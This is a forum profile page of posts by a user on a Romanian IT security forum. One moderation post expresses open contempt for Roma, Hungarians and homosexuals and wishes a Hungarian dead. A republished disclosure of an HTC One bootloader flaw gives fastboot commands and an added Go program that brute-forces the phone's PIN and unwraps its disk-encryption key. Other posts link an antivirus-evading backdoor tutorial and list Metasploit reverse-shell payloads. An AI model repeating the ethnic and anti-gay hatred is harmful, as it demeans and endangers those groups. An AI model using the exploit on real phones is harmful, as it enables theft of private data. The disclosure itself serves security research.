Everything posted by Nytro
-
Mugur Isarescu for president. Puie Monta!
-
Hi. I understand your opinions and fully agree with them: I piss on gypsies, Hungarians and homosexuals. BUT this is an IT security forum. Here we talk about computers. I, too, often want to draw the world's attention to the "crows", but I hold back because this is not the right place for such discussions. Also, I don't think anyone on the staff likes these specimens. We all hate them, but having discussions on the forum solves nothing. This forum is for IT-related discussions, period. On another note, it's OK to open 2-3 threads about these issues, but I don't really see the point of them here. People come here (or at least they should) to see what's new in the field, read a tutorial or watch a video. I'm sick of how many gypsies I see on the street or on TV, I don't want to see them on the forum too. I don't want to see on RST as well that some damn Hungarian wants autonomy, because my pulse goes up wishing him dead and that's not good for my health. The conclusion is simple: stop posting such topics here. Then, regarding language, it's OK to curse the Hungarians' and gypsies' dead and wounded, but it is NOT OK to do that towards members. We don't mind the language, but we don't tolerate personal attacks. We all have moments when we get angry, but swearing at a moderator doesn't help us at all, maybe it just makes us feel better for 5 seconds. We understand you; I hope you understand us too.
-
IBM SyNAPSE TrueNorth, the human brain in a silicon chip
Dorian Prodan - 8 Aug 201

Three years ago, IBM Research and Cornell University presented the first prototype of the Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) processor and its interesting internal architecture, which mimics the neural network of the human brain. Improved and made more efficient, the SyNAPSE processor has evolved, and the first finished product in this line is ready to enter production: TrueNorth.

Artificial intelligence researchers have long experimented with ever more advanced software solutions, but the SyNAPSE developers consider that tackling this difficult problem with ordinary computing systems is inefficient. While current computing systems offer raw processing capacity that exceeds the limits of the human brain, they are incapable of efficiently imitating the fineness of the neural interconnections that underlie independent thought and consciousness. Where current processors fail, IBM Research and Cornell say SyNAPSE shines.

The new processor has 5.4 billion transistors organized into 4096 cores, a structure that is logically organized into one million artificial neurons and 256 million synapses. Each of these cores has a storage capacity of over 100,000 bits and a set of synaptic links to the adjacent cores, which allows it to store and process information in the same memory space, to remember the neurons from which it received or to which it sent data, and to weigh the strength of the interconnections, just like a human brain. Each core also contains the hardware needed to address a specific neuron in another core, the data being generated in bursts and sent through the shared synaptic network from node to node until it reaches its destination.

When a core has nothing to process it stops, and this asynchronous mode of operation is also reflected in superior energy efficiency. Manufactured by Samsung in a 28 nm process, the SyNAPSE TrueNorth processor runs at a frequency of only 1 kHz and has a tiny power consumption of 70 mW. These processors can in turn be grouped into more powerful processing units, and IBM says the technological leap is overwhelming: a system that fits in the palm of a hand offers the processing power of an entire rack of traditional computing systems, and comparative energy tests showed that SyNAPSE TrueNorth is 176,000 times more efficient than a standard computing system and 7,000 times more efficient than current specialized hardware.

The biggest problem with the new processor is the currently sparse software offering. The SyNAPSE hardware implementation started from the foundation of a software solution called Compass, and all Compass applications are compatible with TrueNorth. To put this processor to use in every possible domain, IBM and the other interested companies will have to develop more complex and varied software solutions. The company believes, however, that the moment when we will see implementations with hundreds of thousands of cores, hundreds of millions of neurons and hundreds of billions of synapses will arrive in the near future, and that this will revolutionize the entire IT industry.

Source: IBM SyNAPSE TrueNorth, creierul uman într-o pastilă de siliciu
-
Scammer. Topic closed.
-
That settles it. You're a scammer. Permanent ban.
-
If anyone wants to give a presentation, they can contact me. If anyone can find a sponsorship, at the company they work for, for example, please contact me.
-
Application Security Analyst
Req. Number: 37027
Location Information: Bucharest, BUCHAREST, Romania

We're EA, the world's largest video game publisher. You're probably familiar with many of our titles: Madden, FIFA, The Sims, Need for Speed, Dead Space, Battlefield and Star Wars, to name a few. But maybe you don't know how we're committed to creating games for every platform, from social to mobile to console, to give our consumers the anytime, anywhere access they demand. What does that mean for you? It means more opportunities to unleash your creative genius, be inspired by those around you and ignite your path in any direction you choose.

Application Security Specialist & Penetration Tester

Summary:
The Application Security Specialist and Penetration Tester is a member of the RedTeam within the Security and Risk Management (SRM) group, which provides security governance and support for EA's business worldwide. We see the Application Security Specialist and Penetration Tester as a special breed of security consultant who tries to break into or find possible exploits in different computer systems and software. Some might call this position ethical hacker; what we're looking for is a truly gifted, security-minded hacker. You will be expected to find and exploit vulnerabilities in EA's applications and infrastructure and fill out assessment reports to detail the findings. While you will often be running pre-determined types of tests based on industry standards, you will also be designing your own tests a large portion of the time, which requires creativity and imagination, along with a superb level of technical knowledge. With these tests and assessments, you'll be conducting regular security audits from both a logical/theoretical and a technical/hands-on standpoint. By identifying which flaws can be exploited to cause business risk, you will provide crucial insights into the most pressing issues and suggest how to prioritize security resources.

The main focuses for this role are:
- To conduct dynamic application security analysis on a multitude of platforms: PC, web, mobile and consoles
- To exploit security flaws and vulnerabilities with attack simulations on multiple projects, working against specific focused scopes of work
- To perform infrastructure security assessments (network and server-side related security tasks)
- To advise and consult with EA staff in order to reduce risks
- To provide relevant metrics (improve existing and develop new ones) that allow the general business and SRM to understand risk as it pertains to the business and products
- Solve complex technical problems and articulate them to non-IT personnel
- Perform, review and analyze security vulnerability data to identify applicability and false positives
- Research and develop testing tools, techniques, and process improvements
- Teach, learn and develop the skillset with the RedTeam

In addition the successful candidate will:
- Have the ability to flow from black box to gray box to white box tests
- Work with product teams as well as core IT applications, infrastructure and operations to enhance the security of the corporation; communication and exposure to the management team will be required for this role
- Provide SRM with information necessary to improve security throughout the organization in SRM's ongoing programs such as Security Awareness
- Enhance the existing library of development examples and materials to improve integrating security into the Software Development Life-Cycle (SDLC)
- Write guidelines and best practices from penetration test findings so teams can follow best practices on future development efforts

Job required knowledge, skills and abilities:
- Relevant similar experience
- Very good understanding of the OWASP Top 10
- Experience with the inner workings and security aspects of a variety of Application Servers, Web Servers, Media/Content Servers, Messaging Servers, Database Servers, and Integration Servers
- Excellent networking skills in multiple environments
- Experience with multiple Layer 7 intercepting proxies
- Knowledge of recognized security industry standards and best practices such as the OWASP Testing Project, OSSTMM, PCI DSS, ISO 27000 set
- Good understanding of application development in multiple languages such as ASP.NET, Java, C/C++, and common scripting languages
- Excellent verbal, written, and interpersonal skills and professionalism in dealing with all levels of management and staff

Additional, nice to have, skills and education:
- Bachelor's degree in an information technology related field
- An information security certification like CEH, ECSA, LPT, CCSP, CISSP, Security+
- Experience with web application security assessment tools: HP WebInspect, Qualys, Burp Suite
- Involvement in security related Open Source projects and security groups

Job Setting:
The duties of this position will be performed at EA's office in Bucharest. The candidate will be expected to work alone, around others, under minimal supervision and tight deadlines. Occasional travel will be required.

It's not easy building the world's best digital playground. It's hair-standing-on-end exhilarating. It's down-in-the-trenches challenging. It's stroke-of-brilliance-at-midnight creative. It's you, taking risks, challenging yourself, pursuing ideas, changing the way millions of people do something they love: play. In an industry that's changing every day, EA is positioned for growth thanks to smart business plans, strategic acquisitions, and most importantly, our creative people around the world who gather each day to unite the world through play. We take that last part very seriously, so if what you're reading excites you as much as it does us, apply today.

To apply: http://careersearch.ea.com/ro/bucharest/it/jobid5649661-application-security-analyst-jobs
Or, if you want your CV to land directly where it needs to go, you can send it to me by PM and I will forward it.
-
OK, now we can talk properly.
-
Leave the staff out of it. Sort out the problem.
-
Basic Dynamic Analysis With IDA Pro And WinDbg

Description: In this video you will learn how to use IDA Pro and WinDbg for basic dynamic analysis. These tools are very powerful for the reverse engineering process, malware analysis, and finding vulnerabilities.

Source: OpenSecurity Research
Source: Basic Dynamic Analysis With IDA Pro And WinDbg
-
Veil Framework - Create An Undetected Backdoor

Description: In this video you will learn how to use the Veil Framework for penetration testing. This is a very good solution for AV evasion. Nowadays our first challenge is to bypass AV, and this framework is all about AV evasion. Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions.

https://www.veil-framework.com/framework/veil-evasion/

Source: Veil Framework - Create An Undetected Backdoor
-
Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password
By cedric » Wednesday 23 July 2014, 11:50 - Forensics

TL;DR
This article deals with the presence of the "read_mmc" command in the HTC One phone. Our target phone had Android 4.2.2 and HBOOT 1.54.0000. This vulnerability was reported to HTC in February 2014 and was fixed with the KitKat (4.4.2) upgrade released in March 2014. Since then, HTC has told us it would be addressed in operator ROMs. We are happy to say that it has been patched in all of them except one. As a consequence, we have decided to release the information about it.

The "read_emmc" command had already been disclosed in a previous article for the HTC Desire Z, released in 2011. This command allows an attacker with physical access to read the flash memory of the phone, and possibly obtain sensitive information such as SMS messages, contacts and so on. Furthermore, this command allows an attacker to bruteforce the PIN/passcode in an automated way that would not be possible without it. It opens an additional breach against users who define easily guessable PIN/passcodes (such as a 4-digit PIN). This is often the case because the same PIN/passcode is also used to unlock the phone on a daily basis. Finally, the attack presented in this article also applies to HTC One devices where Full Disk Encryption (FDE) is enabled, i.e. when the phone is protected with Android encryption.

The "read_mmc" command appears to be a debug function that is not present on every HTC phone. In our opinion, this command should not appear in any released phone. This article details the strong security mechanisms (AES encryption, correct key size, salt) used in Android FDE for the HTC One and the problematic context: the "read_mmc" debug command and a weak PIN/password allow an attacker to bruteforce it "offline" (from a computer) and access user-protected data.

Accessing the flash memory
The HTC One is powered down and plugged into our computer. Then it is put in fastboot mode. This can be done by holding VOL DOWN + POWER, then releasing POWER while holding VOL DOWN. Then we can switch from HBOOT to fastboot mode. From there, we can use the "fastboot" binary from the Android SDK to read the flash memory. The command has the following format:

read_mmc [emmc/sd] [start] [#blocks] [#blocks/read] [show]

The arguments are defined as follows:
- first parameter: where to read from. "emmc" to read the flash, "sd" to read the sdcard
- start: offset (in blocks, i.e. 512-byte units) in the raw flash memory
- #blocks: number of blocks to read
- #blocks/read: number of blocks to read at a time
- show: set to 1 to display the result

An attentive reader may have noticed that it is called "read_mmc" here instead of the older "read_emmc" command, but its purpose is the same. To read the first sector, one can use the following command:

$ fastboot oem read_mmc emmc 0 1 1 1
...
(bootloader) reading sector 0 ~ 0
(bootloader) 0
...
(bootloader) 0
(bootloader) DF
(bootloader) FF
(bootloader) 3
(bootloader) 0
(bootloader) 20
(bootloader) E0
(bootloader) 9F
(bootloader) 3
(bootloader) 55
(bootloader) AA
(bootloader) read sector done average = 172
OKAY [  0.310s]
finished. total time: 0.311s

We can see that it has lots of zeros at the beginning (more than 400 bytes) and that it ends with the "55 AA" magic bytes, the signature of a partition table. Using an ADB shell on the device, we see that the userdata partition is the "mmcblk0p37" block device and starts at sector 6422528. It corresponds to the "ext4" partition mounted under Android.

shell@android:# cat /proc/emmc
dev:    size     erasesize name
...
mmcblk0p37: 680000000 00000200 "userdata"
shell@android:# cat /sys/block/mmcblk0/mmcblk0p37/start
6422528
shell@android:# mount
...
/dev/block/mmcblk0p37 /data ext4 rw,nosuid,nodev,noatime,discard,noauto_da_alloc,data=ordered 0 0

Consequently, an attacker can use the "read_mmc" command with the above offset (6422528 and following) in the flash memory to read any sector within the userdata partition, even if the user has defined a PIN/passcode to protect the phone.

$ fastboot oem read_mmc emmc 6422530 1 1 1
...
(bootloader) reading sector 6422530 ~ 6422530
(bootloader) 0
...
(bootloader) 2F
(bootloader) 64
(bootloader) 61
(bootloader) 74
(bootloader) 61
...
(bootloader) read sector done average = 146
OKAY [  0.359s]
finished. total time: 0.359s

The "2F 64 61 74 61" sequence of bytes is the ASCII string "/data", which is located at the beginning of the userdata partition.

As we already detailed in the previous article, our first idea was to dump the whole userdata partition from the flash memory. However, it is really slow and would take several days or even months. As a side note, the HTC One does not discharge when in HBOOT/fastboot mode and plugged into a computer, so a whole dump is theoretically "easier" than it was with the HTC Desire Z. Another approach is to use FUSE (Filesystem in Userspace) to mount the userdata partition remotely (over USB) from a computer. Mounting the partition only requires reading a few sectors and is significantly faster. We can then access any file. Indeed, this also works for the HTC One.

Bypassing the Android Full Disk Encryption (FDE)
When working on the HTC Desire Z, there was no "Full Disk Encryption" (FDE) option available because it ran Android 2.x at that time, and encryption is not supported before Android 4.x on phones. We decided to analyze whether there was a way to bypass FDE using the "read_mmc" vulnerability. Thomas Cannon published back in 2012 at Defcon his excellent slides showing how FDE works on default Android (based on the Android source code, a.k.a. AOSP), along with scripts to both bruteforce the PIN/passcode and decrypt userdata sectors. At that time he was working on the Google Nexus S, a phone built by Google itself. Consequently, it uses the default Android sources and has not been modified by any manufacturer. This is different for our HTC One, since HTC built it from its own modified version of AOSP and its own hardware.

We decided to encrypt the device by enabling it in "Storage > Phone storage encryption". After dumping all the partitions and diffing them against a dump made before encryption, we easily noticed that the "extra" partition is the FDE header used to store the encrypted master key. As detailed in Thomas' slides, the PIN/passcode defined by the user is used in conjunction with the encrypted master key (between {...} below) and the salt (between [...] below) to derive the decrypted master key. This decrypted master key is then used to decrypt each sector of the userdata partition. We can also infer from the header the algorithm used for /data sector decryption (aes-cbc-essiv:sha256).

$ hexdump -C extra
00000000  c4 b1 b5 d0 01 00 00 00  68 00 00 00 00 00 00 00  |........h.......|
00000010  20 00 00 00 00 00 00 00  00 00 40 03 00 00 00 00  | .........@.....|
00000020  00 00 00 00 61 65 73 2d  63 62 63 2d 65 73 73 69  |....aes-cbc-essi|
00000030  76 3a 73 68 61 32 35 36  00 00 00 00 00 00 00 00  |v:sha256........|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  00 00 00 00 00 00 00 00 {15 d2 9c 16 1c 54 40 1c  |.............T@.|
00000070  b4 c1 e4 91 69 10 4b 55  2e 47 64 31 13 52 ad 2d  |....i.KU.Gd1.R.-|
00000080  bd 8c 42 8e d6 c4 84 00} 00 00 00 00 00 00 00 00  |..B.............|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00 [c7 1f 34 80 97 09 fd 39  |..........4....9|
000000b0  0b 4a 91 d9 d9 d8 00 cd] 00 00 00 00 00 00 00 00  |.J..............|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000200

Note: for further details on the master key derivation and data decryption internals, we definitely advise you to have a look at Thomas' slides.

Since we have located the encryption header, we easily get the offset in the flash memory where it is stored.

shell@android:# cat /proc/emmc
dev:    size     erasesize name
...
mmcblk0p27: 00010000 00000200 "extra"
shell@android:# cat /sys/block/mmcblk0/mmcblk0p27/start
586799

Then, we can double-check that our userdata partition is encrypted, as the first bytes amusingly tell us: "This is an encrypted device:)". This is an addition made by HTC specifically for the HTC One. They can do so because the first bytes are not used in a default ext4 partition. Everything else is random bytes, as expected.

shell@android:# ./busybox hexdump -C /dev/block/mmcblk0p37 -n 64
00000000  54 68 69 73 20 69 73 20  61 6e 20 65 6e 63 72 79  |This is an encry|
00000010  70 74 65 64 20 64 65 76  69 63 65 3a 29 6f c3 a0  |pted device:)o..|
00000020  26 bc 76 ed a8 77 ef 6a  95 28 32 ab 24 ce 8d 58  |&.v..w.j.(2.$..X|
00000030  91 fe 8e 14 9e 81 05 a4  28 65 64 3c 1b e2 11 56  |........(ed<...V|
00000040

We can then check that we can access this header and the encrypted userdata partition with the fastboot "read_mmc" command, which is indeed possible.

$ fastboot oem read_mmc emmc 586799 1 1 1

From this, we can build a small script that reads the FDE header (located in the "extra" partition) and the first sector of the "userdata" partition and bruteforces them locally on our computer.

# python bruteforce_htcone_over_reademmc.py
oem read_mmc emmc 6422528 1 1 1
oem read_mmc emmc 586799 1 1 1
Footer File    : extra
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 0
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 256 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x15D29C161C54401CB4C1E49169104B552E4764311352AD2DBD8C428ED6C48400
Salt           : 0xC71F34809709FD390B4A91D9D9D800CD
----------------
Trying to Bruteforce Password... please wait
Found PIN!: 0000
Saving decrypted master key to 'keyfile'

We can easily bruteforce any 4-digit PIN in a matter of minutes with a regular PC. This takes a little time since the master key derivation needs 2000 iterations, but it is definitely possible. Additionally, we save the decrypted master key for further analysis.

The PIN/passcode set up by the user is used for both:
(1) decrypting the phone when it is switched on
(2) accessing the phone after a given delay during regular daily use

Even if the user wants to protect his phone with a complex PIN/password for (1), he will definitely want to use a simple one for (2) because he will use it a lot to access his phone. Consequently, the scenario of bruteforcing the PIN/passcode assuming that it is a 4-digit PIN (and not a complex one with digits and letters) makes sense. Moreover, encrypting a phone using a pattern instead of a PIN/password is not supported in Android for now. We can add that it would not help against bruteforce anyway, since the pattern is stored as a sequence of numbers that do not repeat.

Mounting the encrypted userdata partition (remotely over USB)
Since an attacker is able to bruteforce the PIN/passcode easily using what we explained above, he is able to switch on the phone normally and enter the found PIN/passcode to bypass the lock screen. Then he can enable ADB and dump everything he wants. We do not need to go further. However, for completeness (and also because it is always interesting to know how to mount an encrypted userdata partition), we will detail how to do it. Basically, this consists of using cryptsetup (version >= 1.6.0 in order to support the "plain" type), specifying the "plain" type, the decryption algorithm (aes-cbc-essiv:sha256) and the "keyfile" holding our previously decrypted master key.

# mkdir mnt
# losetup /dev/loop0 userdata.img
# cryptsetup --type plain open -c aes-cbc-essiv:sha256 -d keyfile /dev/loop0 userdata
# mount /dev/mapper/userdata mnt

In our case, we can "even" do it over USB using the "read_mmc" command. All the tools to replay these scenarios are released in our GitHub repository.

Again, we would like to thank the HTC security team for their support and for patching this vulnerability in the KitKat upgrade.

Source: Exploiting a vulnerability in HTC One bootloader and bruteforcing the PIN/password - Sogeti ESEC Lab
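As an added example (not code from the Sogeti article, from Thomas Cannon's scripts or from Android itself), the Go program below walks through the derivation the post describes: PBKDF2-HMAC-SHA1 with 2000 iterations over the PIN and the footer's salt yields 32 bytes, of which the first 16 are an AES-128 key and the next 16 an IV that CBC-decrypt the stored master key; the master key then decrypts userdata sectors with aes-cbc-essiv:sha256, where the IV for sector n is AES_{SHA256(master key)}(n). Rather than checking the first sector, which HTC overwrites with the "This is an encrypted device:)" marker, the example decrypts sector 2 of the partition, where the ext4 superblock lives (consistent with the page's read of sector 6422530 showing "/data", the superblock's last-mounted-path field), and accepts a PIN when the s_magic value 0xEF53 appears at offset 0x38. Because no device dump is embedded, a buildFixture helper fabricates an encrypted master key and an encrypted superblock sector for a constructed 256-bit key, salt and PIN; those values, and the four-digit search space, are assumptions made for this example. Go is used because its standard library provides AES, CBC, HMAC and SHA without third-party packages.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// In the footer dumped above: cipher name at 0x24, 32-byte encrypted master key at 0x68, 16-byte salt at 0xA8.
const pbkdf2Iters = 2000 // iteration count hard-coded in Android 4.x cryptfs

// pbkdf2SHA1 implements RFC 2898 PBKDF2 with HMAC-SHA1 (not in the Go stdlib).
func pbkdf2SHA1(pass, salt []byte, iters, keyLen int) []byte {
	prf := hmac.New(sha1.New, pass)
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iters; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// cbc runs AES-CBC without padding; callers only pass 16- or 32-byte keys.
func cbc(key, iv, in []byte, decrypt bool) []byte {
	c, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	mode := cipher.NewCBCEncrypter(c, iv)
	if decrypt {
		mode = cipher.NewCBCDecrypter(c, iv)
	}
	out := make([]byte, len(in))
	mode.CryptBlocks(out, in)
	return out
}

// unwrapMasterKey derives key||iv (16+16 bytes) from PIN and salt and
// AES-128-CBC-decrypts the stored master key, as Android's cryptfs does.
func unwrapMasterKey(pin string, encKey, salt []byte) []byte {
	ik := pbkdf2SHA1([]byte(pin), salt, pbkdf2Iters, 32)
	return cbc(ik[:16], ik[16:], encKey, true)
}

// cryptSector applies aes-cbc-essiv:sha256 to one 512-byte sector: the IV is
// the little-endian sector number encrypted with AES under SHA256(masterKey).
func cryptSector(masterKey []byte, sector uint64, in []byte, decrypt bool) []byte {
	h := sha256.Sum256(masterKey)
	iv := make([]byte, aes.BlockSize)
	binary.LittleEndian.PutUint64(iv, sector)
	c, _ := aes.NewCipher(h[:]) // 32-byte key, cannot fail
	c.Encrypt(iv, iv)
	return cbc(masterKey, iv, in, decrypt)
}

// bruteForcePIN tries all four-digit PINs offline. sector2 is the third sector of
// userdata (the ext4 superblock); its s_magic 0xEF53 at 0x38 only decrypts correctly with the right key.
func bruteForcePIN(encKey, salt, sector2 []byte) (string, []byte, bool) {
	for n := 0; n < 10000; n++ {
		pin := fmt.Sprintf("%04d", n)
		mk := unwrapMasterKey(pin, encKey, salt)
		if pt := cryptSector(mk, 2, sector2, true); pt[0x38] == 0x53 && pt[0x39] == 0xEF {
			return pin, mk, true
		}
	}
	return "", nil, false
}

// buildFixture fabricates the encrypted master key and encrypted superblock
// sector for a known PIN; constructed test data, not bytes from a real device.
func buildFixture(pin string, masterKey, salt []byte) (encKey, sector2 []byte) {
	ik := pbkdf2SHA1([]byte(pin), salt, pbkdf2Iters, 32)
	plain := make([]byte, 512)
	plain[0x38], plain[0x39] = 0x53, 0xEF // ext4 s_magic, little-endian
	return cbc(ik[:16], ik[16:], masterKey, false), cryptSector(masterKey, 2, plain, false)
}

func main() {
	masterKey := []byte("constructed-32-byte-master-key!!") // 256-bit, constructed
	salt := []byte("0123456789abcdef")                      // constructed
	encKey, sector2 := buildFixture("0137", masterKey, salt)
	pin, mk, ok := bruteForcePIN(encKey, salt, sector2)
	fmt.Printf("found=%v pin=%s master key=%x\n", ok, pin, mk)
}
```

Against a real dump, the 32 bytes at footer offset 0x68 and the 16 bytes at 0xA8 (as in the hexdump above), together with sector 2 of userdata pulled with read_mmc, go straight into bruteForcePIN. Each guess costs 4000 HMAC-SHA1 computations (two PBKDF2 blocks of 2000 iterations), so the whole 10^4 space is a matter of seconds to minutes, which is the concrete reason the post gives for not reusing the unlock PIN as the disk-encryption passphrase.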
-
Shellcode Detection and Emulation with Libemu

Introduction
Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/honeypot systems for emulating x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, to analyze shellcode inside malicious .rtf/.pdf documents, etc. It has a lot of use cases and is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using GetPC heuristics, as we will see later in the article.

The very first thing we can do is download Libemu via Git with the following command:

# git clone git://git.carnivore.it/libemu.git

If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 ANSI C code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page, where it's evident that about 50k lines of code have been written. The installation instructions can be found at [1], which is why we won't describe them in this article. We can also install Pylibemu, so we can interact with Libemu directly from Python.

Creating the Shellcode
Let's create a simple test case with Metasploit to see how Libemu works. First, we have to create a shellcode with msfpayload, a command-line tool built specifically to generate and output various versions of shellcode. Let's first list all Linux payloads by grepping for the "linux" keyword in the msfpayload output.

# msfpayload -l 2>&1 | grep linux
linux/armle/adduser                      Create a new user with UID 0
linux/armle/exec                         Execute an arbitrary command
linux/armle/shell/bind_tcp               Listen for a connection, dup2 socket in r12, then execve
linux/armle/shell/reverse_tcp            Connect back to the attacker, dup2 socket in r12, then execve
linux/armle/shell_bind_tcp               Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp            Connect back to attacker and spawn a command shell
linux/mipsbe/shell_reverse_tcp           Connect back to attacker and spawn a command shell
linux/mipsle/shell_bind_tcp              Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp           Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/ppc/shell_find_port                Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp               Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port              Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp            Connect back to attacker and spawn a command shell
linux/x86/exec                           Execute an arbitrary command
linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port
linux/x86/shell_find_port                Spawn a shell on an established connection
linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/x86/adduser                        Create a new user with UID 0
linux/x86/chmod                          Runs chmod on specified file with specified mode
linux/x86/exec                           Execute an arbitrary command
linux/x86/meter preter/bind_ipv6_tcp      Listen for a connection over IPv6, Staged meterpreter server
linux/x86/meterpreter/bind_nonx_tcp      Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/bind_tcp           Listen for a connection, Staged meterpreter server
linux/x86/meterpreter/find_tag           Use an established connection, Staged meterpreter server
linux/x86/meterpreter/reverse_ipv6_tcp   Connect back to attacker over IPv6, Staged meterpreter server
linux/x86/meterpreter/reverse_nonx_tcp   Connect back to the attacker, Staged meterpreter server
linux/x86/meterpreter/reverse_tcp        Connect back to the attacker, Staged meterpreter server
linux/x86/metsvc_bind_tcp                Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp             Stub payload for interacting with a Meterpreter Service
linux/x86/read_file                      Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp            Listen for a connection over IPv6, Spawn a command shell (staged)
linux/x86/shell/bind_nonx_tcp            Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/bind_tcp                 Listen for a connection, Spawn a command shell (staged)
linux/x86/shell/find_tag                 Use an established connection, Spawn a command shell (staged)
linux/x86/shell/reverse_ipv6_tcp         Connect back to attacker over IPv6, Spawn a command shell (staged)
linux/x86/shell/reverse_nonx_tcp         Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell/reverse_tcp              Connect back to the attacker, Spawn a command shell (staged)
linux/x86/shell_bind_ipv6_tcp            Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp                 Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port
linux/x86/shell_find_port                Spawn a shell on an established connection
linux/x86/shell_find_tag                 Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp              Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2             Connect back to attacker and spawn a command shell

Full article: Shellcode Detection and Emulation with Libemu - InfoSec Institute
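The GetPC heuristics the article mentions rest on one fact: self-decoding shellcode has to learn its own address before it can touch its encoded body, and on x86 it does so with a handful of idioms. The Go program below is an added example, not libemu or InfoSec Institute code; it statically scans a buffer for the three classic idioms (call $+5 then pop, fnstenv [esp-0xC] then pop, and jmp-short/call-back/pop). Libemu itself instead emulates the buffer from every offset and flags an instruction that moves EIP into a register, which also catches variants this pattern match will miss. The sample buffers are constructed decoder prologues with filler bytes and one benign HTTP request, not captured payloads.

```go
package main

import "fmt"

// GetPCHit records the offset of a position-independence idiom and its kind.
type GetPCHit struct {
	Offset int
	Kind   string
}

// isPop32 matches the one-byte pop r32 encodings 0x58..0x5F (pop eax..pop edi).
func isPop32(b byte) bool { return b >= 0x58 && b <= 0x5F }

// rel32 decodes a little-endian signed 32-bit displacement.
func rel32(b []byte) int {
	return int(int32(uint32(b[0]) | uint32(b[1])<<8 | uint32(b[2])<<16 | uint32(b[3])<<24))
}

// scanGetPC flags the three classic x86 GetPC idioms that decoder stubs use to
// learn their own address. It is a static stand-in for libemu's emulation.
func scanGetPC(buf []byte) []GetPCHit {
	var hits []GetPCHit
	for i := 0; i < len(buf); i++ {
		switch {
		// E8 00 00 00 00 5x: call pushes the address of the pop, pop takes it.
		case i+6 <= len(buf) && buf[i] == 0xE8 && rel32(buf[i+1:]) == 0 && isPop32(buf[i+5]):
			hits = append(hits, GetPCHit{i, "call-pop"})
		// D9 74 24 F4: fnstenv [esp-0xC] leaves the last FPU instruction's EIP
		// at [esp]; a pop within the next few bytes collects it.
		case i+4 <= len(buf) && buf[i] == 0xD9 && buf[i+1] == 0x74 && buf[i+2] == 0x24 && buf[i+3] == 0xF4:
			for j := i + 4; j < len(buf) && j < i+8; j++ {
				if isPop32(buf[j]) {
					hits = append(hits, GetPCHit{i, "fnstenv-pop"})
					break
				}
			}
		// EB dd: jmp forward to an E8 whose rel32 lands on the byte after the
		// jmp, which must be the pop that receives the pushed address.
		case i+3 <= len(buf) && buf[i] == 0xEB && int8(buf[i+1]) > 0 && isPop32(buf[i+2]):
			tgt := i + 2 + int(int8(buf[i+1]))
			if tgt+5 <= len(buf) && buf[tgt] == 0xE8 && tgt+5+rel32(buf[tgt+1:]) == i+2 {
				hits = append(hits, GetPCHit{i, "jmp-call-pop"})
			}
		}
	}
	return hits
}

// Constructed samples (not real payloads): well-known decoder prologues followed by filler.
var (
	SampleCallPop    = []byte{0x90, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5B, 0x83, 0xC3, 0x0C}             // nop; call $+5; pop ebx; add ebx,12
	SampleFnstenvPop = []byte{0xD9, 0xEE, 0xD9, 0x74, 0x24, 0xF4, 0x5B, 0x31, 0xC9}                   // fldz; fnstenv [esp-0xC]; pop ebx; xor ecx,ecx
	SampleJmpCallPop = []byte{0xEB, 0x05, 0x5E, 0x31, 0xC0, 0x90, 0x90, 0xE8, 0xF6, 0xFF, 0xFF, 0xFF} // jmp +5; pop esi; xor eax,eax; nop; nop; call -10
	SampleBenign     = []byte("GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n")
)

func main() {
	samples := []struct {
		name string
		data []byte
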